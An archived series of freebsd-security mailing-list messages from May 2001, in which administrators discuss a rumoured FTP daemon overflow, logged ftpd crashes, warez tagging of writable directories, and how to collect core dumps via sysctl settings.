FreeBSD specific FTP vulnerability? > > -Alex > > On Tue, 22 May 2001, Ryan wrote: > > > There is an ftp vuln... I do not have any details on it sorry.. Some kinda > > overflow.. I would run proftpd > > > > > > ----- Original Message ----- > > From: "Retal" > > To: > > Sent: Tuesday, May 22, 2001 5:48 PM > > Subject: Re: Is there a ftp vuln in 4.3-STABLE > > > > > > > My guess, this happened to you because a mistaken chmod, like perhaps you > > > chmoded one of the following directories into the FTP directory for > > writing? > > > You should it. > > > > > > -Liran Dahan (lirandb@netvision.net.il, retal@retal.co.il) > > > > > > ----- Original Message ----- > > > From: "serkoon" > > > To: "Mike" ; > > > Cc: > > > Sent: Tuesday, May 22, 2001 11:11 PM > > > Subject: Re: Is there a ftp vuln in 4.3-STABLE > > > > > > > > > > I don't know what the mess below all means, but what I do know is > > > > that there were some warez-kids who put some nice warez on your > > > > ftp or were going to. (they tend to 'tag' an ftp first, to fill it up > > > > afterwards). > > > > > > > > > 1mbtest.ptf > > > > > ???? Tagged By Wizardz Fxp ???? > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 19:33:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtppop1pub.verizon.net (smtppop1pub.gte.net [206.46.170.20]) by hub.freebsd.org (Postfix) with ESMTP id 671EF37B42C for ; Tue, 22 May 2001 19:33:26 -0700 (PDT) (envelope-from res03db2@gte.net) Received: from gte.net (evrtwa1-ar4-4-34-145-186.evrtwa1.dsl.gtei.net [4.34.145.186]) by smtppop1pub.verizon.net with ESMTP ; id VAA114347356 Tue, 22 May 2001 21:25:36 -0500 (CDT) Received: (from res03db2@localhost) by gte.net (8.9.3/8.9.3) id TAA20077; Tue, 22 May 2001 19:34:27 -0700 (PDT) (envelope-from res03db2@gte.net) Date: Tue, 22 May 2001 19:34:27 -0700 From: Robert Clark To: Olivier Nicole Cc: veldy@veldy.net, glassfish@frogbox.dyndns.org, freebsd-security@FreeBSD.ORG Subject: Re: Qmail + FreeBSD 4.3 Message-ID: <20010522193427.A20063@darkstar.gte.net> References: <019b01c0e2fe$eb384d40$3028680a@tgt.com> <200105230058.HAA13422@banyan.cs.ait.ac.th> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <200105230058.HAA13422@banyan.cs.ait.ac.th>; from on@cs.ait.ac.th on Wed, May 23, 2001 at 07:58:31AM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Or it fails some number of years later, when you power it on. [RC] On Wed, May 23, 2001 at 07:58:31AM +0700, Olivier Nicole wrote: > Hi, > > As a good rule, hardware fails in the first hour after turning the > power on for the first time, or it will fails some months/years later. > > Like anything, hardware do wear off, let say your CPU fan lightly slow > down, it means CPU heat increase. Memory and card connectors are > submitted to vibrations, even if not perceptible to human, so the > contacts get oxyded (sp?). Examples could be multiple, it is not just > disk mortors that fails. > > Best regards, > > olivier > > > Well bad hardware is less likely than its trying to overwrite memory it > > doesn't own. If he is being attacked, and it is a buffer overflow exploit, > > than overwriting memory it doesn't own is more likely than it being > > repeatidly hardware, especially after his system has been working fine all > > this time. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 19:39:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-9.dsl.lsan03.pacbell.net [63.207.60.9]) by hub.freebsd.org (Postfix) with ESMTP id 8535037B42C for ; Tue, 22 May 2001 19:39:53 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id EFF1066B5F; Tue, 22 May 2001 19:39:52 -0700 (PDT) Date: Tue, 22 May 2001 19:39:52 -0700 From: Kris Kennaway To: Alex Cc: Ryan , freebsd-security@FreeBSD.ORG Subject: Re: Is there a ftp vuln in 4.3-STABLE Message-ID: <20010522193952.A33978@xor.obsecurity.org> References: <000501c0e316$7deb4450$45d8db40@mhx800> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="qDbXVdCdHGoSgWSk" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from alex@nixfreak.org on Tue, May 22, 2001 at 08:26:29PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --qDbXVdCdHGoSgWSk Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, May 22, 2001 at 08:26:29PM -0400, Alex wrote: > Is this a FreeBSD specific FTP vulnerability? >=20 > -Alex >=20 > On Tue, 22 May 2001, Ryan wrote: >=20 > > There is an ftp vuln... I do not have any details on it sorry.. Some ki= nda > > overflow.. I would run proftpd No-one has informed the security-officer about any new vulnerability in FreeBSD (or for that matter, about third party ftpd ports). It's probably worthwhile not flying into a panic until someone actually provides some corroborating evidence. Kris --qDbXVdCdHGoSgWSk Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7CyL4Wry0BWjoQKURAiAgAKCE1oLTSoaKtmVwOfse9YWwyvNCgQCguq/M kAFt1gdditzpLi1fS5m44KQ= =T13+ -----END PGP SIGNATURE----- --qDbXVdCdHGoSgWSk-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 19:46:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from beppo.feral.com (beppo.feral.com [192.67.166.79]) by hub.freebsd.org (Postfix) with ESMTP id 28C3137B422 for ; Tue, 22 May 2001 19:46:18 -0700 (PDT) (envelope-from mjacob@feral.com) Received: from beppo (mjacob@beppo [192.67.166.79]) by beppo.feral.com (8.11.3/8.11.3) with ESMTP id f4N2a2P01102 for ; Tue, 22 May 2001 19:36:02 -0700 (PDT) (envelope-from mjacob@feral.com) Date: Tue, 22 May 2001 19:35:56 -0700 (PDT) From: Matthew Jacob Reply-To: mjacob@feral.com To: security@freebsd.org Subject: ftp security (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ---------- Forwarded message ---------- Date: Wed, 23 May 2001 09:59:08 +0800 (CST) From: "[gb2312] Gang Li" To: freebsd-bugs@FreeBSD.ORG, freebsd-bug@FreeBSD.ORG Subject: ftp security hi, I find ftp.cn.freebsd.org/pub/ports/distfiles has 777 privilliage,I think it is no good, if it is an error, pls check it soon. wish you be better. _________________________________________________________ Do You Yahoo!? =B5=C7=C2=BC=C3=E2=B7=D1=D1=C5=BB=A2=B5=E7=D3=CA! http://mai= l.yahoo.com.cn =BE=DB=BD=B9=B2=C6=BE=AD=C8=C8=B5=E3=A3=AC=BE=A1=C0=BF=C9=CC=BA=A3=B7=E7=D4= =C6=A3=A1=A1=AA=A1=AA=20 =D1=C5=BB=A2=B2=C6=BE=AD=C8=AB=D0=C2=B8=C4=B0=E6! http://cn.finance.yahoo.c= om To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 19:50:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from magnetar.blackhatnetworks.com (magnetar.blackhatnetworks.com [65.166.202.3]) by hub.freebsd.org (Postfix) with ESMTP id BD33537B422 for ; Tue, 22 May 2001 19:50:43 -0700 (PDT) (envelope-from alex@nixfreak.org) Received: from localhost (alex@localhost.blackhatnetworks.com [127.0.0.1]) by magnetar.blackhatnetworks.com (8.x/8.x) with ESMTP id f4N2oTt10143; Tue, 22 May 2001 22:50:29 -0400 (EDT) Date: Tue, 22 May 2001 22:50:29 -0400 (EDT) From: Alex X-X-Sender: To: Kris Kennaway Cc: Ryan , Subject: Re: Is there a ftp vuln in 4.3-STABLE In-Reply-To: <20010522193952.A33978@xor.obsecurity.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Indeed, I'm not at all worried. I just was wondering if there was any additional information available regarding this specific alledged vulnerability. -Alex > On Tue, May 22, 2001 at 08:26:29PM -0400, Alex wrote: > > Is this a FreeBSD specific FTP vulnerability? > > > > -Alex > > > > On Tue, 22 May 2001, Ryan wrote: > > > > > There is an ftp vuln... I do not have any details on it sorry.. Some kinda > > > overflow.. I would run proftpd > > No-one has informed the security-officer about any new vulnerability > in FreeBSD (or for that matter, about third party ftpd ports). It's > probably worthwhile not flying into a panic until someone actually > provides some corroborating evidence. > > Kris > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 20:46: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from server1.link-net.com (link-net.com [209.10.61.231]) by hub.freebsd.org (Postfix) with ESMTP id 4369D37B424 for ; Tue, 22 May 2001 20:46:05 -0700 (PDT) (envelope-from scott@link-net.com) Received: from scott1 (scott1.link-net.com [209.10.61.241]) by server1.link-net.com (Post.Office MTA v3.5.3 release 223 ID# 0-52894U200L100S0V35) with ESMTP id com for ; Tue, 22 May 2001 20:46:04 -0700 Reply-To: From: "Scott Raymond" To: Subject: RE: Is there a ftp vuln in 4.3-STABLE Date: Tue, 22 May 2001 20:46:02 -0700 Keywords: FreeBSD Organization: LinkAmerica Communications Message-ID: <003401c0e33a$e44fb090$f13d0ad1@linknet.com> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: quoted-printable X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Seeing as how there is no corroborating evidence to support this "exploit", only second-hand hearsay, I'd say this is more of a FUD troll than an actual security warning. -- Scott =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D Scott Raymond LinkAmerica Communications http://soundamerica.com =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG=20 > [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of Alex > Sent: Tuesday, May 22, 2001 7:50 PM > To: Kris Kennaway > Cc: Ryan; freebsd-security@FreeBSD.ORG > Subject: Re: Is there a ftp vuln in 4.3-STABLE >=20 >=20 > Indeed, I'm not at all worried. I just was wondering if=20 > there was any > additional information available regarding this specific alledged > vulnerability. >=20 > -Alex >=20 > > On Tue, May 22, 2001 at 08:26:29PM -0400, Alex wrote: > > > Is this a FreeBSD specific FTP vulnerability? > > > > > > -Alex > > > > > > On Tue, 22 May 2001, Ryan wrote: > > > > > > > There is an ftp vuln... I do not have any details on it=20 > sorry.. Some kinda > > > > overflow.. I would run proftpd > > > > No-one has informed the security-officer about any new vulnerability > > in FreeBSD (or for that matter, about third party ftpd ports). It's > > probably worthwhile not flying into a panic until someone actually > > provides some corroborating evidence. > > > > Kris > > >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message >=20 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 21: 4:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from sbtx.tmn.ru (sbtx.tmn.ru [212.76.160.49]) by hub.freebsd.org (Postfix) with ESMTP id D573D37B43C for ; Tue, 22 May 2001 21:04:50 -0700 (PDT) (envelope-from serg@sbtx.tmn.ru) Received: from sv.tech.sibitex.tmn.ru (sv.tech.sibitex.tmn.ru [212.76.160.59]) by sbtx.tmn.ru (8.11.1/8.11.1) with ESMTP id f4N44mT08134; Wed, 23 May 2001 10:04:49 +0600 (YEKST) (envelope-from serg@sbtx.tmn.ru) Received: (from serg@localhost) by sv.tech.sibitex.tmn.ru (8.11.3/8.11.3) id f4N44mQ15183; Wed, 23 May 2001 10:04:48 +0600 (YEKST) (envelope-from serg) Date: Wed, 23 May 2001 10:04:48 +0600 From: "Sergey N. Voronkov" To: Kris Kennaway Cc: freebsd-security@FreeBSD.ORG Subject: Re: Is there a ftp vuln in 4.3-STABLE Message-ID: <20010523100448.A15088@sv.tech.sibitex.tmn.ru> References: <000501c0e316$7deb4450$45d8db40@mhx800> <20010522193952.A33978@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010522193952.A33978@xor.obsecurity.org>; from kris@obsecurity.org on Tue, May 22, 2001 at 07:39:52PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, May 22, 2001 at 07:39:52PM -0700, Kris Kennaway wrote: > On Tue, May 22, 2001 at 08:26:29PM -0400, Alex wrote: > > Is this a FreeBSD specific FTP vulnerability? > > > > -Alex > > > > On Tue, 22 May 2001, Ryan wrote: > > > > > There is an ftp vuln... I do not have any details on it sorry.. Some kinda > > > overflow.. I would run proftpd > > No-one has informed the security-officer about any new vulnerability > in FreeBSD (or for that matter, about third party ftpd ports). It's > probably worthwhile not flying into a panic until someone actually > provides some corroborating evidence. > When I'v found this staff in my logfiles I'v change native ftpd to luke's one. Sorry, can't get core to you... And don't want to setup native daemon to provide potential hole to someone. May 16 15:50:34 ftp /kernel: pid 5272 (ftpd), uid 14: exited on signal 11 May 17 21:02:20 ftp /kernel: pid 11157 (ftpd), uid 14: exited on signal 11 Also I have one questtion: how to setup ftpd to allow it dumping core to specified destination? Bye, Serg N. Voronkov To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 21:35:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from magnetar.blackhatnetworks.com (magnetar.blackhatnetworks.com [65.166.202.3]) by hub.freebsd.org (Postfix) with ESMTP id 37AB537B424 for ; Tue, 22 May 2001 21:35:36 -0700 (PDT) (envelope-from alex@nixfreak.org) Received: from localhost (alex@localhost.blackhatnetworks.com [127.0.0.1]) by magnetar.blackhatnetworks.com (8.x/8.x) with ESMTP id f4N4ZFt10655; Wed, 23 May 2001 00:35:15 -0400 (EDT) Date: Wed, 23 May 2001 00:35:15 -0400 (EDT) From: Alex X-X-Sender: To: "Sergey N. Voronkov" Cc: Kris Kennaway , Subject: Re: Is there a ftp vuln in 4.3-STABLE In-Reply-To: <20010523100448.A15088@sv.tech.sibitex.tmn.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > When I'v found this staff in my logfiles I'v change native ftpd to luke's > one. Sorry, can't get core to you... And don't want to setup native daemon > to provide potential hole to someone. > > May 16 15:50:34 ftp /kernel: pid 5272 (ftpd), uid 14: exited on signal 11 > May 17 21:02:20 ftp /kernel: pid 11157 (ftpd), uid 14: exited on signal 11 Who owns UID 14 own that machine? Not root I presume. So the process itself that segmentation faulted wasn't actually executed by root. Is UID 14 an FTP account for running the daemon? -Alex > > Also I have one questtion: how to setup ftpd to allow it dumping core to > specified destination? > > Bye, > > Serg N. Voronkov > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 21:45:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 3847E37B422 for ; Tue, 22 May 2001 21:45:44 -0700 (PDT) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (1461 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Tue, 22 May 2001 23:44:23 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Tue, 22 May 2001 23:44:04 -0500 (CDT) From: James Wyatt To: Alex Cc: "Sergey N. Voronkov" , Kris Kennaway , freebsd-security@FreeBSD.ORG Subject: Re: Is there a ftp vuln in 4.3-STABLE In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Sergey N. Voronkov wrote: > When I'v found this staff in my logfiles I'v change native ftpd to luke's > one. Sorry, can't get core to you... And don't want to setup native daemon > to provide potential hole to someone. > > May 16 15:50:34 ftp /kernel: pid 5272 (ftpd), uid 14: exited on signal 11 > May 17 21:02:20 ftp /kernel: pid 11157 (ftpd), uid 14: exited on signal 11 On Wed, 23 May 2001, Alex replied: > Who owns UID 14 own that machine? Not root I presume. So the > process itself that segmentation faulted wasn't actually executed by root. > Is UID 14 an FTP account for running the daemon? The normal FreeBSD 'ftp' user is uid 14. I'd expect most of the default servers to be running that ID for anonymous file access. - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 21:50:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-9.dsl.lsan03.pacbell.net [63.207.60.9]) by hub.freebsd.org (Postfix) with ESMTP id 8B26037B422 for ; Tue, 22 May 2001 21:50:35 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id F0C6166BF7; Tue, 22 May 2001 21:50:34 -0700 (PDT) Date: Tue, 22 May 2001 21:50:34 -0700 From: Kris Kennaway To: "Sergey N. Voronkov" Cc: Kris Kennaway , freebsd-security@FreeBSD.ORG Subject: Re: Is there a ftp vuln in 4.3-STABLE Message-ID: <20010522215034.A36060@xor.obsecurity.org> References: <000501c0e316$7deb4450$45d8db40@mhx800> <20010522193952.A33978@xor.obsecurity.org> <20010523100448.A15088@sv.tech.sibitex.tmn.ru> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="sm4nu43k4a2Rpi4c" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010523100448.A15088@sv.tech.sibitex.tmn.ru>; from serg@tmn.ru on Wed, May 23, 2001 at 10:04:48AM +0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --sm4nu43k4a2Rpi4c Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, May 23, 2001 at 10:04:48AM +0600, Sergey N. Voronkov wrote: > On Tue, May 22, 2001 at 07:39:52PM -0700, Kris Kennaway wrote: > > On Tue, May 22, 2001 at 08:26:29PM -0400, Alex wrote: > > > Is this a FreeBSD specific FTP vulnerability? > > >=20 > > > -Alex > > >=20 > > > On Tue, 22 May 2001, Ryan wrote: > > >=20 > > > > There is an ftp vuln... I do not have any details on it sorry.. Som= e kinda > > > > overflow.. I would run proftpd > >=20 > > No-one has informed the security-officer about any new vulnerability > > in FreeBSD (or for that matter, about third party ftpd ports). It's > > probably worthwhile not flying into a panic until someone actually > > provides some corroborating evidence. > >=20 >=20 > When I'v found this staff in my logfiles I'v change native ftpd to luke's > one. Sorry, can't get core to you... And don't want to setup native daemon > to provide potential hole to someone. >=20 > May 16 15:50:34 ftp /kernel: pid 5272 (ftpd), uid 14: exited on signal 11 > May 17 21:02:20 ftp /kernel: pid 11157 (ftpd), uid 14: exited on signal 11 >=20 > Also I have one questtion: how to setup ftpd to allow it dumping core to > specified destination? Use the kern.corefile sysctl Kris --sm4nu43k4a2Rpi4c Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7C0GaWry0BWjoQKURAknjAJ9rCydNeVeCHMDHMOTcG7NJiFPwnwCgvlJn 0FYHr7vjFYu1ra7XLlzbLAM= =Bwza -----END PGP SIGNATURE----- --sm4nu43k4a2Rpi4c-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 21:59:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from sbtx.tmn.ru (sbtx.tmn.ru [212.76.160.49]) by hub.freebsd.org (Postfix) with ESMTP id 6192C37B424 for ; Tue, 22 May 2001 21:59:09 -0700 (PDT) (envelope-from serg@sbtx.tmn.ru) Received: from sv.tech.sibitex.tmn.ru (sv.tech.sibitex.tmn.ru [212.76.160.59]) by sbtx.tmn.ru (8.11.1/8.11.1) with ESMTP id f4N4x7T10593; Wed, 23 May 2001 10:59:07 +0600 (YEKST) (envelope-from serg@sbtx.tmn.ru) Received: (from serg@localhost) by sv.tech.sibitex.tmn.ru (8.11.3/8.11.3) id f4N4x7f15413; Wed, 23 May 2001 10:59:07 +0600 (YEKST) (envelope-from serg) Date: Wed, 23 May 2001 10:59:07 +0600 From: "Sergey N. Voronkov" To: Alex Cc: Kris Kennaway , freebsd-security@FreeBSD.ORG Subject: Re: Is there a ftp vuln in 4.3-STABLE Message-ID: <20010523105907.A15346@sv.tech.sibitex.tmn.ru> References: <20010523100448.A15088@sv.tech.sibitex.tmn.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from alex@nixfreak.org on Wed, May 23, 2001 at 12:35:15AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, May 23, 2001 at 12:35:15AM -0400, Alex wrote: > > When I'v found this staff in my logfiles I'v change native ftpd to luke's > > one. Sorry, can't get core to you... And don't want to setup native daemon > > to provide potential hole to someone. > > > > May 16 15:50:34 ftp /kernel: pid 5272 (ftpd), uid 14: exited on signal 11 > > May 17 21:02:20 ftp /kernel: pid 11157 (ftpd), uid 14: exited on signal 11 > > Who owns UID 14 own that machine? Not root I presume. So the > process itself that segmentation faulted wasn't actually executed by root. > Is UID 14 an FTP account for running the daemon? > UID 14 is for FS access only. ftpd is running with root privileges, becose it can't make new connection from privileged port (ftp-data, for example) when it isn't root-privileged. So, any potential hole or buffer overflow in ftpd is permission to someone to get root shell onto your ftpserver. chroot'ed shell, but root's in any case. About UID 14: It'l be very very nice if someone can tell me about dumping core from seteuid'ed ftpd to ANY specifyed directory? Bye, Serg. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 22: 6:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from sbtx.tmn.ru (sbtx.tmn.ru [212.76.160.49]) by hub.freebsd.org (Postfix) with ESMTP id 1A8F537B446 for ; Tue, 22 May 2001 22:06:10 -0700 (PDT) (envelope-from serg@sbtx.tmn.ru) Received: from sv.tech.sibitex.tmn.ru (sv.tech.sibitex.tmn.ru [212.76.160.59]) by sbtx.tmn.ru (8.11.1/8.11.1) with ESMTP id f4N568T11038; Wed, 23 May 2001 11:06:08 +0600 (YEKST) (envelope-from serg@sbtx.tmn.ru) Received: (from serg@localhost) by sv.tech.sibitex.tmn.ru (8.11.3/8.11.3) id f4N568X15464; Wed, 23 May 2001 11:06:08 +0600 (YEKST) (envelope-from serg) Date: Wed, 23 May 2001 11:06:08 +0600 From: "Sergey N. Voronkov" To: Kris Kennaway Cc: freebsd-security@FreeBSD.ORG Subject: Re: Is there a ftp vuln in 4.3-STABLE Message-ID: <20010523110608.A15449@sv.tech.sibitex.tmn.ru> References: <000501c0e316$7deb4450$45d8db40@mhx800> <20010522193952.A33978@xor.obsecurity.org> <20010523100448.A15088@sv.tech.sibitex.tmn.ru> <20010522215034.A36060@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010522215034.A36060@xor.obsecurity.org>; from kris@obsecurity.org on Tue, May 22, 2001 at 09:50:34PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > Also I have one questtion: how to setup ftpd to allow it dumping core to > > specified destination? > > Use the kern.corefile sysctl > Many-many thanks! I'l try to setup native ftpd on my work machine and get the core for freebsd-team, but it is on about 100 times less load camparing to ftp-server :-(. Serg. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 22:37:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-9.dsl.lsan03.pacbell.net [63.207.60.9]) by hub.freebsd.org (Postfix) with ESMTP id CC5AB37B424 for ; Tue, 22 May 2001 22:37:49 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 0533266B5F; Tue, 22 May 2001 22:37:48 -0700 (PDT) Date: Tue, 22 May 2001 22:37:48 -0700 From: Kris Kennaway To: "Sergey N. Voronkov" Cc: Alex , Kris Kennaway , freebsd-security@FreeBSD.ORG Subject: Re: Is there a ftp vuln in 4.3-STABLE Message-ID: <20010522223748.A36767@xor.obsecurity.org> References: <20010523100448.A15088@sv.tech.sibitex.tmn.ru> <20010523105907.A15346@sv.tech.sibitex.tmn.ru> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="wRRV7LY7NUeQGEoC" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010523105907.A15346@sv.tech.sibitex.tmn.ru>; from serg@tmn.ru on Wed, May 23, 2001 at 10:59:07AM +0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --wRRV7LY7NUeQGEoC Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Wed, May 23, 2001 at 10:59:07AM +0600, Sergey N. Voronkov wrote: > About UID 14: It'l be very very nice if someone can tell me about dumping > core from seteuid'ed ftpd to ANY specifyed directory? kern.corefile kern.sugid_coredump Kris --wRRV7LY7NUeQGEoC Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7C0ysWry0BWjoQKURAiaKAJ9J3vFqCjyPrS5qLzI3sIhx2lwdwwCgyAny M0g1X5OWyJ6QeqkSIQRlw/8= =eaq9 -----END PGP SIGNATURE----- --wRRV7LY7NUeQGEoC-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 23:54:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from euphoria.digitalextreme.org (euphoria.digitalextreme.org [204.212.149.31]) by hub.freebsd.org (Postfix) with SMTP id BA10D37B424 for ; Tue, 22 May 2001 23:54:21 -0700 (PDT) (envelope-from subscribed@de-net.org) Received: (qmail 16108 invoked by uid 504); 22 May 2001 23:49:52 -0000 Received: from unknown (HELO extremist) (204.212.149.57) by euphoria.digitalextreme.org with SMTP; 22 May 2001 23:49:52 -0000 From: "Dan Graaff" To: "Robert Clark" , "Olivier Nicole" Cc: , , Subject: RE: 